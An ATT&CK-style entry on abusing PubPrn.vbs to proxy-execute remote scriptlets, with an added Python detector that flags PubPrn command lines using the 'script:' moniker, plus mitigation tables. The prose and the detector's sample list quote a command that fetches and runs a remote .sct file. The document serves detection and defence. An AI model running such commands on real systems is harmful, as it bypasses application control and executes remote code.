T1216.001 PubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via `Cscript.exe`. For example, the following code publishes a printer within the specified domain: `cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com`.
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second `script:` parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is `pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct`. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), `PubPrn.vbs` has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to `LDAP://`, vice the `script:` moniker which could be used to reference remote code via HTTP(S).
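As an added example (not part of the ATT&CK entry), the following Python classifies process-creation command lines by the second parameter passed to PubPrn, separating ordinary `LDAP://` publishing from use of the `script:` moniker. The label names, the file paths and every sample line other than the two commands quoted above are constructed for illustration.

```python
import re
import shlex

# pubprn or pubprn.vbs, bare or at the end of a path (case-insensitive).
PUBPRN = re.compile(r"(?:^|[\\/])pubprn(?:\.vbs)?$", re.IGNORECASE)

def script_args(cmdline):
    """Return the arguments passed to PubPrn, or None if it is not invoked."""
    try:
        toks = shlex.split(cmdline, posix=False)  # non-POSIX keeps backslashes
    except ValueError:                            # unbalanced quote
        toks = cmdline.split()
    toks = [t.replace('"', "") for t in toks]
    for i, tok in enumerate(toks):
        if PUBPRN.search(tok):
            # Script-host options (//nologo, //b ...) are not script arguments.
            return [a for a in toks[i + 1:] if not a.startswith("//")]
    return None

def classify(cmdline):
    """Label one command line by PubPrn's second parameter."""
    args = script_args(cmdline)
    if args is None:
        return "not-pubprn"
    second = args[1].lower() if len(args) > 1 else ""
    if second.startswith("script:"):
        target = second[len("script:"):]
        remote = target.startswith(("http://", "https://"))
        return "script-remote" if remote else "script-moniker"
    return "ldap" if second.startswith("ldap://") else "unexpected"

# Constructed sample; the first two lines are the commands quoted in the text.
SAMPLE = [
    r"cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com",
    r"pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct",
    r'cscript.exe //nologo "C:\Staging Dir\PubPrn.vbs" 127.0.0.1 "SCRIPT:C:\Temp\a.sct"',
    r"cscript //nologo C:\scripts\inventory.vbs LDAP://DC=Domain1,DC=Com",
]

def alerts(cmdlines):
    """Keep every PubPrn invocation that is not a plain LDAP publish."""
    labelled = [(classify(c), c) for c in cmdlines]
    return [(lab, c) for lab, c in labelled if lab not in ("not-pubprn", "ldap")]

if __name__ == "__main__":
    for label, cmd in alerts(SAMPLE):
        print(f"{label:15} {cmd}")
```

The `unexpected` label covers PubPrn invocations whose second parameter is missing or uses neither prefix, which are worth reviewing because the updated script accepts only `LDAP://`.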
| Item | Value |
| --- | --- |
| ID | T1216.001 |
| Sub-techniques | T1216.001 |
| Tactics | TA0005 |
| Platforms | Windows |
| Version | 2.0 |
| Created | 03 February 2020 |
| Last Modified | 18 April 2022 |
Procedure Examples
| ID | Name | Description |
| --- | --- | --- |
| G0050 | APT32 | APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses. |
Mitigations
| ID | Mitigation | Description |
| --- | --- | --- |
| M1040 | Behavior Prevention on Endpoint | On Windows 10, update Windows Defender Application Control policies to include rules that block the older, vulnerable versions of PubPrn. |
| M1038 | Execution Prevention | Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries. |
Detection